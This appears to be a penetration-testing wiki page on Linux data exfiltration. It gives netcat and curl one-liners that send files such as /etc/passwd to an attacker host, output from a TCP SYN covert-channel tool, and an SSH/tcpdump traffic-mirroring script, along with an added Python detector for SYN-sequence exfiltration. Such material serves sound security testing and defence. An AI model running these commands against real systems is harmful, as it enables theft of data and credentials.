Data Exfiltration

Penetration Testing Wiki

Data Exfiltration in Linux

Raw data exfiltration through port 443

On target machine:

nc -nvv $IP 443 < input.txt

On attacker machine:

nc -nvlp 443 > input.txt

HTTP POST data exfiltration through port 8080

On target machine:

curl -T /etc/passwd http://$IP:8080

On attacker machine:

nc -nvlp 8080 | tee passwd


Data exfiltration using TCP SYN

We can use the 32-bit sequence number field of TCP SYN packets to exfiltrate data: each SYN carries four bytes of the file, encoded directly as its initial sequence number, as the output below shows:

$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c
using interface: eth0
#1	 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
#2	 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
#3	 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
#4	 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
#5	 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
#6	 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
#7	 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
#8	 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
#9	 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
#10	 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
[...]
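As an added defender-side example (not part of the original wiki page), the following Python flags SYN flows whose initial sequence numbers decode to text far more often than chance and reconstructs the carried bytes for triage; the ten covert sequence numbers are taken from the output above, while the capture line format, the IP addresses and the benign control ISNs are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample capture, one SYN per line: "src dst dport seq_hex".
# The port-8080 flow reuses the ten sequence numbers from the syn-file output
# above; the port-443 flow is constructed to look like normal, random ISNs.
SAMPLE_SYNS = """\
10.0.0.5 192.168.1.158 8080 0x61743a78
10.0.0.5 192.168.1.158 8080 0x3a32353a
10.0.0.5 192.168.1.158 8080 0x32353a42
10.0.0.5 192.168.1.158 8080 0x61746368
10.0.0.5 192.168.1.158 8080 0x206a6f62
10.0.0.5 192.168.1.158 8080 0x73206461
10.0.0.5 192.168.1.158 8080 0x656d6f6e
10.0.0.5 192.168.1.158 8080 0x3a2f7661
10.0.0.5 192.168.1.158 8080 0x722f7370
10.0.0.5 192.168.1.158 8080 0x6f6f6c2f
10.0.0.9 192.168.1.158 443 0x9f3e21c7
10.0.0.9 192.168.1.158 443 0x0b8ff2a1
10.0.0.9 192.168.1.158 443 0xd4117a03
10.0.0.9 192.168.1.158 443 0x7ce0b95e
"""

def parse_syn_log(text):
    """Return (src, dst, dport, seq) tuples with seq as an int."""
    recs = []
    for line in text.splitlines():
        if line.strip():
            src, dst, dport, seq = line.split()
            recs.append((src, dst, int(dport), int(seq, 16)))
    return recs

def looks_like_text(chunk):
    """Printable ASCII plus tab/CR/LF. A random 32-bit ISN passes this only
    about (98/256)**4 = 2% of the time, so a run of passes is well outside chance."""
    return all(0x20 <= b < 0x7F or b in (9, 10, 13) for b in chunk)

def find_covert_syn_flows(records, min_syns=4, threshold=0.9):
    """Group SYNs by (src, dst, dport) and flag flows whose ISNs decode to text.
    Each ISN is treated as 4 file bytes, big-endian, as in the output above."""
    flows = defaultdict(list)
    for src, dst, dport, seq in records:
        flows[(src, dst, dport)].append(seq.to_bytes(4, "big"))
    hits = {}
    for key, chunks in flows.items():
        ratio = sum(map(looks_like_text, chunks)) / len(chunks)
        if len(chunks) >= min_syns and ratio >= threshold:
            hits[key] = (ratio, b"".join(chunks))  # text ratio + recovered bytes
    return hits
```

Calling `find_covert_syn_flows(parse_syn_log(SAMPLE_SYNS))` returns only the port-8080 flow, with the recovered bytes `at:x:25:25:Batch jobs daemon:/var/spool/`; the random-looking port-443 flow scores 0 and is not reported.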

Mirror target traffic on port 80 to a remote host

#!/bin/bash
# Run tcpdump on the remote host over SSH and stream its pcap output into a
# local Wireshark through a named pipe, so port-80 traffic is viewed live.

sudo su -c "mkfifo /tmp/sharkfin"
sudo su -c "chmod 777 /tmp/sharkfin"
# -k starts capturing immediately; -i reads the pcap stream from the pipe
sudo su -c "wireshark -k -i /tmp/sharkfin &"
# -U flushes each packet as it is captured, -s0 keeps full packets, -w - writes pcap to stdout.
# user@$TARGET_IP is a placeholder: the login in the original was lost in extraction.
ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 user@$TARGET_IP "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin

Data Exfiltration in Windows

See the PowerShell frameworks page.